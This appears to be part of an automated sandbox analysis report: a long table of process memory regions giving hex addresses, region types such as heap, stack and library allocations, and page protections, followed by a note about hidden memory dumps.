trusted library allocation
|
page read and write
|
||
|
4332000
|
trusted library allocation
|
page read and write
|
||
|
1334000
|
heap
|
page read and write
|
||
|
1B1FE000
|
stack
|
page read and write
|
||
|
7FFD9B590000
|
trusted library allocation
|
page read and write
|
||
|
4520000
|
trusted library allocation
|
page read and write
|
||
|
1C7E7000
|
stack
|
page read and write
|
||
|
53EE000
|
stack
|
page read and write
|
||
|
47FE000
|
stack
|
page read and write
|
||
|
46E0000
|
trusted library allocation
|
page read and write
|
||
|
1FD6000
|
trusted library allocation
|
page read and write
|
||
|
7BAC000
|
stack
|
page read and write
|
||
|
4DB000
|
stack
|
page read and write
|
||
|
7FFD9B306000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CFA0000
|
heap
|
page read and write
|
||
|
4C10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B3CC000
|
trusted library allocation
|
page read and write
|
||
|
75AE000
|
stack
|
page read and write
|
||
|
9880000
|
trusted library allocation
|
page read and write
|
||
|
518000
|
stack
|
page read and write
|
||
|
1B200000
|
unkown
|
page readonly
|
||
|
7FFD9B223000
|
trusted library allocation
|
page read and write
|
||
|
4540000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B27C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B2D2000
|
heap
|
page read and write
|
||
|
7FFD9B4F0000
|
trusted library allocation
|
page read and write
|
||
|
1B5E6000
|
unkown
|
page readonly
|
||
|
7FD10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1320000
|
heap
|
page read and write
|
||
|
1206000
|
trusted library allocation
|
page execute and read and write
|
||
|
13E1000
|
heap
|
page read and write
|
||
|
4854000
|
trusted library allocation
|
page read and write
|
||
|
206B000
|
trusted library allocation
|
page read and write
|
||
|
3F8E000
|
stack
|
page read and write
|
||
|
CAC000
|
stack
|
page read and write
|
||
|
7FFD9B2C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B3C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B484000
|
trusted library allocation
|
page read and write
|
||
|
165D000
|
trusted library allocation
|
page execute and read and write
|
||
|
87B000
|
heap
|
page read and write
|
||
|
C32000
|
unkown
|
page readonly
|
||
|
8BC000
|
heap
|
page read and write
|
||
|
643E000
|
trusted library allocation
|
page read and write
|
||
|
4A3F000
|
stack
|
page read and write
|
||
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
11F4000
|
trusted library allocation
|
page read and write
|
||
|
1BF2E000
|
heap
|
page read and write
|
||
|
1670000
|
trusted library allocation
|
page read and write
|
||
|
B80000
|
trusted library allocation
|
page read and write
|
||
|
1BF0E000
|
heap
|
page read and write
|
||
|
1150000
|
heap
|
page read and write
|
||
|
1672000
|
trusted library allocation
|
page read and write
|
||
|
437B000
|
trusted library allocation
|
page read and write
|
||
|
493E000
|
stack
|
page read and write
|
||
|
4A7E000
|
stack
|
page read and write
|
||
|
4B80000
|
trusted library allocation
|
page read and write
|
||
|
3F71000
|
trusted library allocation
|
page read and write
|
||
|
B50000
|
heap
|
page read and write
|
||
|
97B1000
|
trusted library allocation
|
page read and write
|
||
|
4500000
|
heap
|
page readonly
|
||
|
4822000
|
trusted library allocation
|
page read and write
|
||
|
4365000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B560000
|
trusted library allocation
|
page read and write
|
||
|
1288000
|
heap
|
page read and write
|
||
|
5860000
|
trusted library section
|
page read and write
|
||
|
1FC2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B24B000
|
trusted library allocation
|
page execute and read and write
|
||
|
290E000
|
stack
|
page read and write
|
||
|
59DE000
|
stack
|
page read and write
|
||
|
7FFD9B510000
|
trusted library allocation
|
page read and write
|
||
|
4336000
|
trusted library allocation
|
page read and write
|
||
|
1B0FF000
|
stack
|
page read and write
|
||
|
120A000
|
trusted library allocation
|
page execute and read and write
|
||
|
11ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B390000
|
trusted library allocation
|
page read and write
|
||
|
474E000
|
stack
|
page read and write
|
||
|
2B4000
|
unkown
|
page read and write
|
||
|
A2E000
|
stack
|
page read and write
|
||
|
47AC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B3D3000
|
trusted library allocation
|
page read and write
|
||
|
5660000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B530000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B570000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5C0000
|
trusted library allocation
|
page read and write
|
||
|
25B0000
|
heap
|
page read and write
|
||
|
45F0000
|
trusted library allocation
|
page read and write
|
||
|
2AC7000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B496000
|
trusted library allocation
|
page read and write
|
||
|
295F000
|
stack
|
page read and write
|
||
|
44FF000
|
stack
|
page read and write
|
||
|
7FFD9B405000
|
trusted library allocation
|
page read and write
|
||
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
1643000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DF1000
|
trusted library allocation
|
page read and write
|
||
|
4713000
|
heap
|
page read and write
|
||
|
7FFD9B3E0000
|
trusted library allocation
|
page read and write
|
||
|
338F000
|
trusted library allocation
|
page read and write
|
||
|
5610000
|
trusted library allocation
|
page read and write
|
||
|
589D000
|
stack
|
page read and write
|
||
|
5C31000
|
trusted library allocation
|
page read and write
|
||
|
77EF000
|
stack
|
page read and write
|
||
|
1329000
|
heap
|
page read and write
|
||
|
1200000
|
trusted library allocation
|
page read and write
|
||
|
7FD28000
|
trusted library allocation
|
page execute and read and write
|
||
|
359D000
|
trusted library allocation
|
page read and write
|
||
|
4850000
|
trusted library allocation
|
page read and write
|
||
|
1B327000
|
heap
|
page read and write
|
||
|
7FFD9B3D6000
|
trusted library allocation
|
page read and write
|
||
|
12581000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B3C9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B440000
|
trusted library allocation
|
page read and write
|
||
|
1C5E8000
|
stack
|
page read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
18E5000
|
heap
|
page read and write
|
||
|
7FFD9B56C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B600000
|
trusted library allocation
|
page read and write
|
||
|
1190000
|
heap
|
page read and write
|
||
|
1B359000
|
heap
|
page read and write
|
||
|
7FFD9B340000
|
trusted library allocation
|
page execute and read and write
|
||
|
21CA000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B460000
|
trusted library allocation
|
page read and write
|
||
|
47A0000
|
trusted library allocation
|
page read and write
|
||
|
600E000
|
stack
|
page read and write
|
||
|
7FFD9B43E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B3F0000
|
trusted library allocation
|
page read and write
|
||
|
5E60000
|
trusted library allocation
|
page read and write
|
||
|
5B1000
|
unkown
|
page execute read
|
||
|
7FFD9B56E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B5B0000
|
trusted library allocation
|
page read and write
|
There are 632 hidden memdumps, click here to show them.